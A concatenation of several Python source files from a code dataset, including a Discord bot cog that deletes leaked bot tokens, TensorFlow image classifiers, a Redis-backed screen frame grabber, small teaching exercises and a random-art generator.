1)\nTOKEN_EPOCH = 1_293_840_000\nTOKEN_RE = re.compile(\n r\"(?<=(\\\"|'))\" # Lookbehind: Only match if there's a double or single quote in front\n r\"[^\\s\\.]+\" # Matches token part 1: The user ID string, encoded as base64\n r\"\\.\" # Matches a literal dot between the token parts\n r\"[^\\s\\.]+\" # Matches token part 2: The creation timestamp, as an integer\n r\"\\.\" # Matches a literal dot between the token parts\n r\"[^\\s\\.]+\" # Matches token part 3: The HMAC, unused by us, but check that it isn't empty\n r\"(?=(\\\"|'))\" # Lookahead: Only match if there's a double or single quote after\n)\n\n\nclass TokenRemover:\n \"\"\"Scans messages for potential discord.py bot tokens and removes them.\"\"\"\n\n def __init__(self, bot: Bot):\n self.bot = bot\n\n @property\n def mod_log(self) -> ModLog:\n return self.bot.get_cog(\"ModLog\")\n\n async def on_message(self, msg: Message):\n if msg.author.bot:\n return\n\n maybe_match = TOKEN_RE.search(msg.content)\n if maybe_match is None:\n return\n\n try:\n user_id, creation_timestamp, hmac = maybe_match.group(0).split('.')\n except ValueError:\n return\n\n if self.is_valid_user_id(user_id) and self.is_valid_timestamp(creation_timestamp):\n self.mod_log.ignore(Event.message_delete, msg.id)\n await msg.delete()\n await msg.channel.send(DELETION_MESSAGE_TEMPLATE.format(mention=msg.author.mention))\n\n message = (\n \"Censored a seemingly valid token sent by \"\n f\"{msg.author} (`{msg.author.id}`) in {msg.channel.mention}, token was \"\n f\"`{user_id}.{creation_timestamp}.{'x' * len(hmac)}`\"\n )\n log.debug(message)\n\n # Send pretty mod log embed to mod-alerts\n await self.mod_log.send_log_message(\n icon_url=Icons.token_removed,\n colour=Colour(Colours.soft_red),\n title=\"Token removed!\",\n text=message,\n thumbnail=msg.author.avatar_url_as(static_format=\"png\"),\n channel_id=Channels.mod_alerts,\n )\n\n @staticmethod\n def is_valid_user_id(b64_content: str) -> bool:\n b64_content += '=' * (-len(b64_content) % 4)\n\n try:\n content: bytes = base64.b64decode(b64_content)\n return content.decode('utf-8').isnumeric()\n except (binascii.Error, UnicodeDecodeError):\n return False\n\n @staticmethod\n def is_valid_timestamp(b64_content: str) -> bool:\n b64_content += '=' * (-len(b64_content) % 4)\n\n try:\n content = base64.urlsafe_b64decode(b64_content)\n snowflake = struct.unpack('i', content)[0]\n except (binascii.Error, struct.error):\n return False\n return snowflake_time(snowflake + TOKEN_EPOCH) < DISCORD_EPOCH_TIMESTAMP\n\n\ndef setup(bot: Bot):\n bot.add_cog(TokenRemover(bot))\n log.info(\"Cog loaded: TokenRemover\")\n","sub_path":"bot/cogs/token_remover.py","file_name":"token_remover.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"527113309","text":"import tensorflow as tf\nimport numpy as np\nimport sys\n\nFLAGS = tf.app.flags.FLAGS\n\nnum_epochs = 100\n\ntf.app.flags.DEFINE_float('weight_decay', 0.0005,\n \"\"\" \"\"\")\ntf.app.flags.DEFINE_float('alpha', 0.1,\n \"\"\"Leaky RElu param\"\"\")\n\ndef _variable_on_cpu(name, shape, initializer):\n with tf.device('/cpu:0'):\n var = tf.get_variable(name, shape, initializer=initializer)\n return var\n\n\ndef _variable_with_weight_decay(name, shape, stddev, wd):\n \"\"\"Helper to create an initialized Variable with weight decay.\n Note that the Variable is initialized with a truncated normal distribution.\n A weight decay is added only if one is specified.\n Args:\n name: name of the variable\n shape: list of ints\n stddev: standard deviation of a truncated Gaussian\n wd: add L2Loss weight decay multiplied by this float. If None, weight\n decay is not added for this Variable.\n Returns:\n Variable Tensor\n \"\"\"\n var = _variable_on_cpu(name, shape,\n tf.truncated_normal_initializer(stddev=stddev))\n if wd:\n weight_decay = tf.mul(tf.nn.l2_loss(var), wd, name='weight_loss')\n weight_decay.set_shape([])\n tf.add_to_collection('losses', weight_decay)\n return var\n\n\ndef _activation_summary(x):\n tensor_name = x.op.name\n tf.histogram_summary(tensor_name + '/activations', x)\n tf.scalar_summary(tensor_name + '/sparsity', tf.nn.zero_fraction(x))\n\n'''\ndef _conv_layer(inputs, kernel_size, stride, num_features, idx):\n with tf.variable_scope('{0}_conv'.format(idx)) as scope:\n input_channels = inputs.get_shape()[3]\n\n weights = _variable_with_weight_decay('weights', shape=[kernel_size, kernel_size, input_channels, num_features], stddev=0.1, wd=FLAGS.weight_decay)\n biases = _variable_on_cpu('biases', [num_features], tf.constant_initializer(0.1))\n\n conv = tf.nn.conv2d(inputs, weights, strides=[1, stride, stride, 1], padding='SAME')\n conv_biased = tf.nn.bias_add(conv, biases)\n\n #Leaky ReLU\n conv_rect = tf.maximum(FLAGS.alpha*conv_biased, conv_biased, name='{0}_conv'.format(idx))\n return conv_rect\n'''\n\ndef _fc_layer(inputs, hiddens, idx, flat, linear):\n with tf.variable_scope('fc{0}'.format(idx)) as scope:\n input_shape = inputs.get_shape().as_list()\n if flat:\n dim = input_shape[1]*input_shape[2]*input_shape[3]\n inputs_processed = tf.reshape(inputs, [-1,dim])\n else:\n dim = input_shape[1]\n inputs_processed = inputs\n\n weights = _variable_with_weight_decay('weights', shape=[dim,hiddens],stddev=0.01, wd=FLAGS.weight_decay)\n biases = _variable_on_cpu('biases', [hiddens], tf.constant_initializer(0.01))\n if linear:\n return tf.add(tf.matmul(inputs_processed,weights),biases,name=str(idx)+'_fc')\n\n ttt = tf.matmul(inputs_processed, weights)\n ip = tf.add(ttt,biases)\n return tf.maximum(FLAGS.alpha*ip,ip,name=str(idx)+'_fc')\n\n\"\"\"\nReplicating alexnet\nhttps://github.com/tensorflow/tensorflow/blob/master/tensorflow/models/image/alexnet/alexnet_benchmark.py\n\"\"\"\ndef inference(images, name):\n\n parameters = []\n\n # convolution 1\n with tf.name_scope('conv1') as scope:\n kernel = tf.Variable(tf.truncated_normal([11, 11, 3, 64], dtype=tf.float32, stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(images, kernel, [1,4,4,1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32), trainable=True, name='biases')\n bias = tf.nn.bias_add(conv, biases)\n conv1 = tf.nn.relu(bias, name=scope)\n parameters += [kernel, biases]\n\n conv1 = tf.nn.dropout(conv1, .85)\n\n lrn1 = tf.nn.local_response_normalization(conv1, depth_radius=2, alpha=2e-05, beta=0.75, bias=1.0)\n conv1 = lrn1\n\n # pooling 1\n pool1 = tf.nn.max_pool(conv1, ksize=[1,3,3,1], strides=[1,2,2,1], padding='VALID', name='pool1')\n\n # convolution 2\n with tf.name_scope('conv2') as scope:\n kernel = tf.Variable(tf.truncated_normal([5, 5, 64, 192], dtype=tf.float32, stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32), trainable=True, name='biases')\n bias = tf.nn.bias_add(conv, biases)\n conv2 = tf.nn.relu(bias, name=scope)\n\n parameters += [kernel, biases]\n\n conv2 = tf.nn.dropout(conv2, .85)\n\n lrn2 = tf.nn.local_response_normalization(conv2, depth_radius=2, alpha=2e-05, beta=0.75, bias=1.0)\n conv2 = lrn2\n\n # pooling 2\n pool2 = tf.nn.max_pool(conv2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='VALID', name='pool2')\n\n # conv3\n with tf.name_scope('conv3') as scope:\n kernel = tf.Variable(tf.truncated_normal([3, 3, 192, 384], dtype=tf.float32, stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32), trainable=True, name='biases')\n bias = tf.nn.bias_add(conv, biases)\n conv3 = tf.nn.relu(bias, name=scope)\n\n parameters += [kernel, biases]\n\n # conv4\n with tf.name_scope('conv4') as scope:\n kernel = tf.Variable(tf.truncated_normal([3, 3, 384, 256], dtype=tf.float32, stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv3, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32), trainable=True, name='biases')\n bias = tf.nn.bias_add(conv, biases)\n conv4 = tf.nn.relu(bias, name=scope)\n\n parameters += [kernel, biases]\n\n # conv5\n with tf.name_scope('conv5') as scope:\n kernel = tf.Variable(tf.truncated_normal([3, 3, 256, 256], dtype=tf.float32, stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv4, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32), trainable=True, name='biases')\n bias = tf.nn.bias_add(conv, biases)\n conv5 = tf.nn.relu(bias, name=scope)\n\n parameters += [kernel, biases]\n\n # pooling 5\n pool5 = tf.nn.max_pool(conv5, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='VALID', name='pool5')\n\n # fully connected\n #fc = _fc_layer(pool5, 1, 'fc1', True, False)\n\n fc1 = _fc_layer(pool5, 4096, 'fc1', True, False)\n fc2 = _fc_layer(fc1, 4096, 'fc2', False, False)\n fc3 = _fc_layer(fc2, 2, 'fc3', False, False)\n\n y_1 = fc3\n\n# if name == \"train\":\n# fc6_dropout = tf.nn.dropout(fc6, .5)\n# elif name == \"test\":\n# fc6_dropout = tf.nn.dropout(fc6, 1)\n\n #out_shape = tf.pack([config.batch_size, 32, 32, 32])\n\n #print pool5\n #exit()\n #y_1 = _fc_layer(pool5, 1, 'y_1', False, True)\n\n # just for tensorboard\n _activation_summary(y_1)\n\n return y_1\n\n\ndef loss (logits, labels):\n #print logits\n #print labels\n #cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, labels, name='cross_entropy_per_example')\n #cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n #tf.add_to_collection('losses', cross_entropy_mean)\n #return tf.add_n(tf.get_collection('losses'), name='total_loss')\n \n \"\"\" cross entropy loss by converting correcte_output to a one hot vector\"\"\"\n #correct_output_one_hot = architecture.one_hot(correct_output)\n error = tf.reduce_mean(tf.reduce_sum(labels * tf.log(logits), reduction_indices=[1]))\n tf.scalar_summary('loss', error)\n return error\n\n","sub_path":"model/architecture.py","file_name":"architecture.py","file_ext":"py","file_size_in_byte":7385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"492775897","text":"'''\n1. 아직 데이터셋이 없어서 검증 불가\n2. input image의 크기에 따라서 모델 수정 가능성\n3. 데이터셋의 크기에 따라 accuracy가 낮아질 수 있어서 그때에도 hyperparameter (ex.learning rate, batch size ... ) 및 모델 수정 가능성\n4. 한 파일에서 데이터를 불러오고, 전처리를 하고, 모델을 만들고, 학습을 진행하기 때문에 분산해서 만들 생각? 도 있음\n'''\n\nimport tensorflow as tf\n# Load pickled data\nimport pickle\nfrom matplotlib import pyplot\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom sklearn.utils import shuffle\n#from skimage import exposure\n\n#현재 데이터셋이 없어서 검증 불가\n'''\ntraining_file = \"/Users/harshit.sharma/Desktop/udacity_selfdriving/CarND-Traffic-Sign-Classifier-Project/traffic-signs-data/train.p\"\nvalidation_file = \"/Users/harshit.sharma/Desktop/udacity_selfdriving/CarND-Traffic-Sign-Classifier-Project/traffic-signs-data/valid.p\"\ntesting_file = \"/Users/harshit.sharma/Desktop/udacity_selfdriving/CarND-Traffic-Sign-Classifier-Project/traffic-signs-data/test.p\"\n\nwith open(training_file, mode='rb') as f:\n train = pickle.load(f)\nwith open(validation_file, mode='rb') as f:\n valid = pickle.load(f)\nwith open(testing_file, mode='rb') as f:\n test = pickle.load(f)\n'''\n\nX_train, y_train = train['features'], train['labels']\nX_valid, y_valid = valid['features'], valid['labels']\nX_test, y_test = test['features'], test['labels']\n\n\n# TODO: Number of training examples\nn_train = len(X_train)\n\n# TODO: Number of validation examples\nn_validation = len(X_valid)\n\n# TODO: Number of testing examples.\nn_test = len(X_test)\n\n# TODO: What's the shape of an traffic sign image?\n# TODO: 모든 데이터셋의 shape가 동일해야함.\nimage_shape = np.array(X_train[0]).shape\n\n# TODO: How many unique classes/labels there are in the dataset.\nn_classes = len(set(y_train))\nsign_classes, class_indices, class_counts = np.unique(y_train, return_index = True, return_counts = True)\n\npyplot.bar( np.arange( 43 ), class_counts, align='center' )\npyplot.xlabel('Class')\npyplot.ylabel('Number of training examples')\npyplot.xlim([-1, 43])\npyplot.show()\nprint(\"Number of training examples =\", n_train)\nprint(\"Number of testing examples =\", n_test)\nprint(\"Image data shape =\", image_shape)\nprint(\"Number of classes =\", n_classes)\nprint(\"Number of validation examples=\",n_validation)\n\n\n\nindex = random.randint(0, len(X_train))\nimage = X_train[index].squeeze()\n\nplt.figure(figsize=(1,1))\nplt.imshow(image, cmap=\"gray\")\nprint(y_train[index])\n\n\n\n# Data preprocessing : 이미지 전처리\ndef preprocess_dataset(X, y = None):\n #print(X.shape)\n #Convert to grayscale, e.g. single Y channel\n X = 0.299 * X[:, :, :, 0] + 0.587 * X[:, :, :, 1] + 0.114 * X[:, :, :, 2]\n #Scale features to be in [0, 1]\n X = (X / 255.).astype(np.float32)\n # Add a single grayscale channel\n X = X.reshape(X.shape + (1,))\n return X, y\nX_test, y_test = preprocess_dataset(X_test,y_test)\nX,y = X_train,y_train\nX_train,y_train = preprocess_dataset(X_train,y_train)\n#print(X_train.shape)\nX_train, y_train = shuffle(X_train, y_train)\n#X_train = (X_train -128)/128\nX_train, X_validation, y_train, y_validation = train_test_split(X_train, y_train, test_size=0.20)\n\n\nEPOCHS = 40\nBATCH_SIZE = 128\ndropout1 = 0.90 # Dropout, probability to keep units\ndropout2 = 0.80\ndropout3 = 0.70\ndropout4 = 0.50\n\nfrom tensorflow.contrib.layers import flatten\n\nmu = 0\nsigma = 0.1\nlayer1_weight = tf.Variable(tf.truncated_normal([5, 5, 1, 6], mean=mu, stddev=sigma))\nlayer1_bias = tf.Variable(tf.zeros(6))\nlayer2_weight = tf.Variable(tf.truncated_normal([5, 5, 6, 16], mean=mu, stddev=sigma))\nlayer2_bias = tf.Variable(tf.zeros(16))\nflat_weight = tf.Variable(tf.truncated_normal([400, 120], mean=mu, stddev=sigma))\nbias_flat = tf.Variable(tf.zeros(120))\nflat_weight2 = tf.Variable(tf.truncated_normal([120, 84], mean=mu, stddev=sigma))\nbias_flat2 = tf.Variable(tf.zeros(84))\nflat_weight3 = tf.Variable(tf.truncated_normal([84, 43], mean=mu, stddev=sigma))\nbias_flat3 = tf.Variable(tf.zeros(43))\n\n\ndef LeNet(x, train=True):\n # Arguments used for tf.truncated_normal, randomly defines variables for the weights and biases for each layer\n x = tf.nn.conv2d(x, layer1_weight, strides=[1, 1, 1, 1], padding='VALID')\n x = tf.nn.bias_add(x, layer1_bias)\n x = tf.nn.relu(x)\n x = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n if (train):\n x = tf.nn.dropout(x, dropout1)\n\n x = tf.nn.conv2d(x, layer2_weight, strides=[1, 1, 1, 1], padding='VALID')\n x = tf.nn.bias_add(x, layer2_bias)\n x = tf.nn.relu(x)\n conv2 = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n if (train):\n conv2 = tf.nn.dropout(conv2, dropout2)\n\n fc0 = flatten(conv2)\n fc1 = tf.add(tf.matmul(fc0, flat_weight), bias_flat)\n fc1 = tf.nn.relu(fc1)\n if (train):\n fc1 = tf.nn.dropout(fc1, dropout3)\n\n fc1 = tf.add(tf.matmul(fc1, flat_weight2), bias_flat2)\n fc1 = tf.nn.relu(fc1)\n if (train):\n fc1 = tf.nn.dropout(fc1, dropout4)\n fc1 = tf.add(tf.matmul(fc1, flat_weight3), bias_flat3)\n logits = tf.nn.relu(fc1)\n\n return logits\n\nx = tf.placeholder(tf.float32, (None, 32, 32, 1))\ny = tf.placeholder(tf.int32, (None))\nkeep_prob = tf.placeholder(tf.float32) #dropout (keep probability)\none_hot_y = tf.one_hot(y, 43)\n\nrate = 0.001\n\nlogits = LeNet(x)\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits)\nloss_operation = tf.reduce_mean(cross_entropy)\noptimizer = tf.train.AdamOptimizer(learning_rate=rate)\n\ntraining_operation = optimizer.minimize(loss_operation)\nlogits_2 = LeNet(x)\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))\naccuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nsaver = tf.train.Saver()\nsession = tf.Session()\nsession.run(tf.global_variables_initializer())\n\n\ndef evaluate(X_data, y_data):\n num_examples = len(X_data)\n total_accuracy = 0\n sess = tf.get_default_session()\n for offset in range(0, num_examples, BATCH_SIZE):\n batch_x, batch_y = X_data[offset:offset + BATCH_SIZE], y_data[offset:offset + BATCH_SIZE]\n accuracy = sess.run(accuracy_operation, feed_dict={x: batch_x, y: batch_y})\n total_accuracy += (accuracy * len(batch_x))\n return total_accuracy / num_examples\n\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n num_examples = len(X_train)\n\n print(\"Training...\")\n print()\n for i in range(EPOCHS):\n X_train, y_train = shuffle(X_train, y_train)\n for offset in range(0, num_examples, BATCH_SIZE):\n end = offset + BATCH_SIZE\n batch_x, batch_y = X_train[offset:end], y_train[offset:end]\n sess.run(training_operation, feed_dict={x: batch_x, y: batch_y})\n\n validation_accuracy = evaluate(X_validation, y_validation)\n print(\"EPOCH {} ...\".format(i + 1))\n print(\"Validation Accuracy = {:.3f}\".format(validation_accuracy))\n print()\n\n saver.save(sess, './lenet')\n print(\"Model saved\")\n\n\nwith tf.Session() as sess:\n saver.restore(sess, './lenet')\n test_accuracy = evaluate(X_test, y_test)\n print(\"Test Accuracy = {:.3f}\".format(test_accuracy))","sub_path":"rsc/DeepLearning/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"80220313","text":"import numpy as np\n\nfrom PIL import Image\n\nimport gi\ngi.require_version('Gdk', '3.0')\n\nfrom gi.repository import Gdk\n\nfrom redis import StrictRedis\n\nfrom lib.config import config\n\nimport time\nfrom datetime import datetime\n\nimport skimage.transform\nimport skimage.color\n\nfrom lib.game_frame import GameFrame\nfrom lib.game_frame_buffer import GameFrameBuffer\n\n\nredis_client = StrictRedis(**config[\"redis\"])\n\n\nclass FrameGrabber:\n\n def __init__(self, width=640, height=480, x_offset=0, y_offset=0, fps=30, buffer_seconds=5):\n self.width = width\n self.height = height\n\n self.x_offset = x_offset\n self.y_offset = y_offset\n\n self.frame_time = 1 / fps\n self.frame_buffer_size = buffer_seconds * fps\n\n self.redis_client = redis_client\n\n # Clear any previously stored frames\n self.redis_client.delete(config[\"frame_grabber\"][\"redis_key\"])\n\n def start(self):\n while True:\n cycle_start = datetime.utcnow()\n frame = self.grab_frame()\n\n self.redis_client.lpush(config[\"frame_grabber\"][\"redis_key\"], frame.tobytes())\n self.redis_client.ltrim(config[\"frame_grabber\"][\"redis_key\"], 0, self.frame_buffer_size)\n\n mini_frame = np.array(\n skimage.transform.resize(\n frame,\n (frame.shape[0] // 8, frame.shape[1] // 8),\n order=0,\n preserve_range=True\n ),\n dtype=\"uint8\"\n )\n\n mini_frame_gray = np.array(skimage.color.rgb2gray(mini_frame), dtype=\"float16\")\n\n self.redis_client.lpush(config[\"frame_grabber\"][\"redis_key\"] + \":MINI\", mini_frame_gray.tobytes())\n self.redis_client.ltrim(config[\"frame_grabber\"][\"redis_key\"] + \":MINI\", 0, self.frame_buffer_size)\n\n cycle_end = datetime.utcnow()\n\n cycle_duration = (cycle_end - cycle_start).microseconds / 1000000\n frame_time_left = self.frame_time - cycle_duration\n\n if frame_time_left > 0:\n time.sleep(frame_time_left)\n\n def grab_frame(self):\n window = Gdk.get_default_root_window()\n\n frame_buffer = Gdk.pixbuf_get_from_window(window, self.x_offset, self.y_offset, self.width, self.height)\n frame_buffer_data = frame_buffer.get_pixels()\n\n stride = frame_buffer.props.rowstride\n mode = \"RGB\"\n\n if frame_buffer.props.has_alpha:\n mode = \"RGBA\"\n\n pil_frame = Image.frombytes(mode, (self.width, self.height), frame_buffer_data, \"raw\", mode, stride)\n frame = np.array(pil_frame)\n\n return frame\n\n @classmethod\n def get_frames(cls, frame_buffer_indices, frame_shape=None, mode=\"BOTH\"):\n game_frame_buffer = GameFrameBuffer(size=len(frame_buffer_indices))\n\n for i in frame_buffer_indices:\n game_frame = None\n\n if mode in [\"FULL\", \"BOTH\"]:\n frame_bytes = redis_client.lindex(config[\"frame_grabber\"][\"redis_key\"], i)\n frame_array = np.fromstring(frame_bytes, dtype=\"uint8\").reshape(frame_shape)\n\n game_frame = GameFrame(frame_array)\n\n if mode in [\"MINI\", \"BOTH\"]:\n mini_frame_shape = (frame_shape[0] // 8, frame_shape[1] // 8)\n\n mini_frame_bytes = redis_client.lindex(config[\"frame_grabber\"][\"redis_key\"] + \":MINI\", i)\n mini_frame_array = np.fromstring(mini_frame_bytes, dtype=\"float16\").reshape(mini_frame_shape)\n\n if mode == \"BOTH\":\n game_frame.frame_variants[\"eighth_grayscale\"] = mini_frame_array\n elif mode == \"MINI\":\n game_frame = GameFrame(mini_frame_array, frame_variants={\"eighth_grayscale\": mini_frame_array})\n\n game_frame_buffer.add_game_frame(game_frame)\n\n return game_frame_buffer\n","sub_path":"lib/frame_grabber.py","file_name":"frame_grabber.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"213169695","text":"class Point:\n def __init__(self, x=0, y=0):\n self.x = x\n self.y = y\n\n def __add__(self, other):\n return Point(self.x+other.x, self.y+other.y)\n\n\npoint = Point(1, 1)\npoint2 = Point(1, 1)\npoint3 = point + point2\nprint(point3.x)\nprint(point3.y)\n\n'''\nWrite a Python program to combine two dictionaries adding values for common keys.\nd1 = {'a': 100, 'b': 200, 'c':300}\nd2 = {'a': 300, 'b': 200, 'd':400}\n\n{'a': 400, 'b': 400, 'd': 400, 'c': 300}\n\n'''\n\n\ndef combine_dictionary(dic1, dic2):\n for key, value in dic1.items():\n if key in dic2:\n dic2[key] = dic1[key] + dic2[key]\n else:\n dic2[key] = value\n return dic2\n\n\nd1 = {'a': 100, 'b': 200, 'c': 300}\nd2 = {'a': 300, 'b': 200, 'd': 400}\nprint(combine_dictionary(d1, d2))\n","sub_path":"python_demo_programs/2021/example_20210808.py","file_name":"example_20210808.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"572222232","text":"# coding=utf-8\nfrom __future__ import print_function, unicode_literals, absolute_import\nimport unittest\nimport os\nimport sys\n\ndirname = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nif dirname not in sys.path:\n sys.path.insert(0, dirname)\n\n\nclass TestValue(unittest.TestCase):\n\n def test(self):\n from container import Queue\n\n queue = Queue.Queue()\n for x in range(0, 10):\n queue.push(x)\n\n self.assertEqual(len(queue), 10)\n\n self.assertEqual(queue.front(), 0)\n\n queue.pop()\n\n self.assertEqual(len(queue), 9)\n self.assertEqual(queue.front(), 1)\n for _ in range(0, 9):\n queue.pop()\n with self.assertRaises(Queue.QueueEmptyException):\n queue.pop()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python/algorithm/test/test_queue.py","file_name":"test_queue.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"228030417","text":"# -*- coding: utf-8 -*-\n\"\"\"\nRandom_art.py\n\n@author: amonmillner, adapted from pruvolo work\n\"\"\"\n\nimport random\nimport math\nimport Image\nim = Image.new(\"RGB\",(350,350))\n\n\ndef build_random_function(min_depth, max_depth):\n\t\"\"\"\n\t# choose one number between min_depth and max_depth randomly, make that depth of function conposed of product, sin_pi, cos_pi randomly.\n\t# input : min_depth(integer), max_depth(integer)\n\t# output : random function(nested list)\n\t\"\"\"\n\tfunction = [] # put random functions in here\n\tdepth = random.randint(min_depth,max_depth)\n\tx = depth\n\t# functions are chosen in below two lists \n\tbuilding_block = [[\"prod\",'a','b'],[\"cos_pi\",'a'],[\"sin_pi\",'a']] \n\tsimple_block = [['x'],['y']] \n\n\tif x == 1:\n\t\ta = random.choice(simple_block) # depth = 1 so choose x or y\n\t\tfunction.append(a)\n\t\tx = x-1 # to return function when x=0\n\t\treturn a\n\t\t\n\tif x > 1:\n\t\ta = random.choice(building_block) # choose prod or sin or cos\n\t\tfunction.append(a)\n\t\tif a == building_block[0]: # if a = \"prod\"\n\t\t\ta[1] = build_random_function(x-1,x-1) # use recursion\n\t\t\ta[2] = build_random_function(x-1,x-1) # length of prod list is 3 so need 2 argument\n\t\t\treturn a\n\t\telse: # if a = \"cos_pi\" of \"sin_pi\"\n\t\t\ta[1] = build_random_function(x-1,x-1) # use recursion / need only 1 argument\n\t\t\treturn a\n\n\tif x==0: # making random function finish so return function\n\t\treturn function\n\n\n\ndef evaluate_random_function(f,x,y):\n\t\"\"\"\n\t# calcuate function f using argument x and y.\n\t# input : f (nested list), x(float), y(float)\n\t# output : calculated value (float)\n\t\"\"\"\n\tx1 = float(x)\n\ty1 = float(y)\n\ta = f \n\tif len(a)==3: # if a[0]=\"prod\"\n\t\tif len(a[1])>1: # if a[1] is nested list\n\t\t\tone = float(evaluate_random_function(a[1],x1,y1)) # use recursion\n\t\t\ttwo = float(evaluate_random_function(a[2],x1,y1))\n\t\t\treturn one*two \n\t\tif len(a[1])==1: # if a[1] is ['x'] or ['y']\n\t\t\tif a[1]==['x'] and a[2]==['x']:\n\t\t\t\treturn x1*x1\n\t\t\telif a[1]==['x'] and a[2]==['y']:\n\t\t\t\treturn x1*y1\n\t\t\telif a[1]==['y'] and a[2]==['x']:\n\t\t\t\treturn x1*y1\n\t\t\telse:\n\t\t\t\treturn y1*y1\n\n\tif len(a)==2: # if a[0] = \"sin_pi\" or \"cos_pi\"\n\t\tif len(a[1]) > 1: # if a[1] is nested list\n\t\t\tone = float(evaluate_random_function(a[1],x1,y1))\n\t\t\tif a[0]=='sin_pi':\n\t\t\t\treturn float(math.sin(math.pi*one))\n\t\t\telse:\n\t\t\t\treturn float(math.cos(math.pi*float(one)))\n\t\tif len(a[1])==1: # if a[1] is ['x'] or ['y']\n\t\t\tif a[0]=='sin_pi' and a[1]==['x']:\n\t\t\t\treturn float(math.sin(math.pi*x1))\n\t\t\telif a[0]=='sin_pi' and a[1]==['y']:\n\t\t\t\treturn float(math.sin(math.pi*y1))\n\t\t\telif a[0]=='cos_pi' and a[1]==['x']:\n\t\t\t\treturn float(math.cos(math.pi*x1))\n\t\t\telse:\n\t\t\t\treturn float(math.cos(math.pi*y1))\n\tif len(a)==1: # if a = ['x'] or ['y']\n\t\tif a[0]=='x':\n\t\t\treturn x1\n\t\telse:\n\t\t\treturn y1\n\n\ndef remap_interval(val,input_interval_start,input_interval_end,output_interval_start,output_interval_end):\n\t\"\"\"\n\t# maps the input value that is in the inverval [input_interval_start, input_interval_end] to the counterpart in output interval [output_interval_start, output_interval_end].\n\t# input : val(number), input_interval_start(number), input_interval_end(number), output_interval_start(number), output_interval_end(number)\n\t# output : corresponding value of input value\n\t\"\"\"\n\ta = float(val)\n\tb = float(input_interval_start)\n\tc= float(input_interval_end)\n\td = float(output_interval_start)\n\te = float(output_interval_end)\n\t# (output_interval_end - output_interval_start) * (value - input_interval_start) / (input_interval_end - input_interval_start) + output_interval_start\n\t# shape of y = ax + b\n\tf = float((e - d) * (val - b) / (c - b) + d)\n\treturn f\n\n\n\n\ndef drawing(min_depth,max_depth,x,y):\n\t\"\"\"\n\t# make 3 random function for red, green and blue, put x axis value and y axis value in each rgb function, put the result to corresponding point in image\n\t# input : min_depth(integer), max_depth(integer), x(number), y(number)\n\t# output : image with random rgb value in every pixels\n\t\"\"\"\n\tR_function = build_random_function(min_depth,max_depth)\n\tG_function = build_random_function(min_depth,max_depth)\n\tB_function = build_random_function(min_depth,max_depth)\n\tim = Image.new(\"RGB\",(x,y)) # make image with x*y size\n\n\tfor i in range(x):\n\t\tfor j in range(y): # for every point in the image\n\t\t\ta = remap_interval(i,0,x-1,-1,1) # if x=5 then interval is [0,4]\n\t\t\tb = remap_interval(j,0,y-1,-1,1)\n\t\t\tred_1 = evaluate_random_function(R_function,a,b) # value is between [-1,1]\n\t\t\tred_2 = int(remap_interval(red_1,-1,1,0,255)) # value is an integer between [0,255] which is for red in rgb\n\t\t\tgreen_1 = evaluate_random_function(G_function,a,b) # value is between [-1,1]\n\t\t\tgreen_2 = int(remap_interval(green_1,-1,1,0,255)) # value is an integer between [0,255] which is for green in rgb\n\t\t\tblue_1 = evaluate_random_function(B_function,a,b) # value is between [-1,1]\n\t\t\tblue_2 = int(remap_interval(blue_1,-1,1,0,255)) # value is an integer between [0,255] which is for blue in rgb\n\t\t\t\n\t\t\tim.putpixel((i,j),(red_2,green_2,blue_2)) # put rgb value in (i,j)\n\t\t\t\n\tim.save('soeun_pattern.png') # save image with name 'soeun_pattern'\n\ndrawing(4,15,350,350) # execuate function\n","sub_path":"MP2/random_art.py","file_name":"random_art.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"581290134","text":"# -*- coding: UTF-8 -*-\n\nimport logging\n\n\ndef 